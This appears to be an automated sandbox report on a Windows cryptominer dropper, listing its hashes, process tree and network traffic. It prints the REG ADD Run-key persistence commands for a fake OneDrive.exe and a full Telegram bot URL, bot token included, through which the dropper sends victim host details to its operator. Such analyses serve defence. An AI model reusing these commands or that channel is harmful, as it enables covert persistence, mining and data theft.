Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/12/2024, 14:04 UTC

General

  • Target

    JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe

  • Size

    6.6MB

  • MD5

    a4ac4ea53e40133a5295125f42b8f44b

  • SHA1

    23515fa205d9552ff9be7c97e4779051e8d3efd6

  • SHA256

    5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce

  • SHA512

    a22a828f23b4add05183c3ae0f3f2fff76991e098b343a2cf34b02d70be72d8d89812ee348f6a0db642450ff29e831d1ff3ff59d427428f737a31bb98b8a874c

  • SSDEEP

    196608:Qv4oFqOMRr29c9lNxQp2QzenyEUBiI+8WO82a3EXfyoo6Y8W/W:i4oFqth9vxQp20TV/8r3cfyos8

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2916 -s 752
          4⤵
          • Loads dropped DLL
          PID:296
      • C:\Windows\SysWOW64\REG.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2764
      • C:\Windows\SysWOW64\REG.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2792

Network

  • Country: US
    DNS
    ipinfo.io
    AppLaunch.exe
    Remote address:
    8.8.8.8:53
    Request
    ipinfo.io
    IN A
    Response
    ipinfo.io
    IN A
    34.117.59.81
  • Country: US
    GET
    http://ipinfo.io/json
    AppLaunch.exe
    Remote address:
    34.117.59.81:80
    Request
    GET /json HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: ipinfo.io
    Response
    HTTP/1.1 200 OK
    access-control-allow-origin: *
    Content-Length: 253
    content-type: application/json; charset=utf-8
    date: Wed, 25 Dec 2024 14:04:50 GMT
    x-content-type-options: nosniff
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
  • Country: US
    DNS
    github.com
    OneDrive.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • Country: US
    DNS
    api.telegram.org
    AppLaunch.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • Country: GB
    GET
    http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip
    OneDrive.exe
    Remote address:
    20.26.156.215:80
    Request
    GET /Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: github.com
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Length: 0
    Location: https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip
  • Country: NL
    GET
    http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A
    AppLaunch.exe
    Remote address:
    149.154.167.220:80
    Request
    GET /bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: api.telegram.org
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.18.0
    Date: Wed, 25 Dec 2024 14:04:51 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: keep-alive
    Location: https://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A
  • 34.117.59.81:80
    http://ipinfo.io/json
    http
    AppLaunch.exe
    303 B
    654 B
    5
    3

    HTTP Request

    GET http://ipinfo.io/json

    HTTP Response

    200
  • 20.26.156.215:80
    http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip
    http
    OneDrive.exe
    376 B
    252 B
    5
    2

    HTTP Request

    GET http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip

    HTTP Response

    301
  • 149.154.167.220:80
    http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A
    http
    AppLaunch.exe
    833 B
    1.9kB
    6
    4

    HTTP Request

    GET http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A

    HTTP Response

    301
  • 20.26.156.215:443
    github.com
    OneDrive.exe
    190 B
    92 B
    4
    2
  • 149.154.167.220:443
    api.telegram.org
    tls
    AppLaunch.exe
    397 B
    219 B
    5
    5
  • 149.154.167.220:443
    api.telegram.org
    tls
    AppLaunch.exe
    359 B
    219 B
    5
    5
  • 149.154.167.220:443
    api.telegram.org
    tls
    AppLaunch.exe
    288 B
    219 B
    5
    5
  • 149.154.167.220:443
    api.telegram.org
    AppLaunch.exe
    190 B
    92 B
    4
    2
  • 8.8.8.8:53
    ipinfo.io
    dns
    AppLaunch.exe
    55 B
    71 B
    1
    1

    DNS Request

    ipinfo.io

    DNS Response

    34.117.59.81

  • 8.8.8.8:53
    github.com
    dns
    OneDrive.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    20.26.156.215

  • 8.8.8.8:53
    api.telegram.org
    dns
    AppLaunch.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\08s5oRQXAhuUIo_s

    Filesize

    215B

    MD5

    c48d171e301f77a3277b41f67834adf7

    SHA1

    0adf07159363866cddf94887eb1b74b9d0379279

    SHA256

    f8dbb84201032c8b6f1ff2de441c3867223af89200e759cc1d7cd00bd8475ad5

    SHA512

    7188011d238f06db092237f7c9e737f7f7783d66f3841eb97454dd8a06f353ea5e13da52b8757bc56560d3336aa2eecf353598b88f5ff572695e58b74aa9d70d

  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

    Filesize

    175KB

    MD5

    f3af73070387fb75b19286826cc3126c

    SHA1

    7774854137d7ada89f3b4bdf67631456a1e74853

    SHA256

    974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610

    SHA512

    a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a

  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Secur32.dll

    Filesize

    316KB

    MD5

    fed6517a5f84eecc29edee5586d7feeb

    SHA1

    56df244bf73c7ec7b59c98e1f5d47b379b58a06b

    SHA256

    5075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6

    SHA512

    45cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642

  • memory/2840-1-0x0000000000AE0000-0x0000000000BE0000-memory.dmp

    Filesize

    1024KB

  • memory/3060-9-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

    Filesize

    4KB

  • memory/3060-11-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB

  • memory/3060-4-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB

  • memory/3060-2-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB

  • memory/3060-12-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB
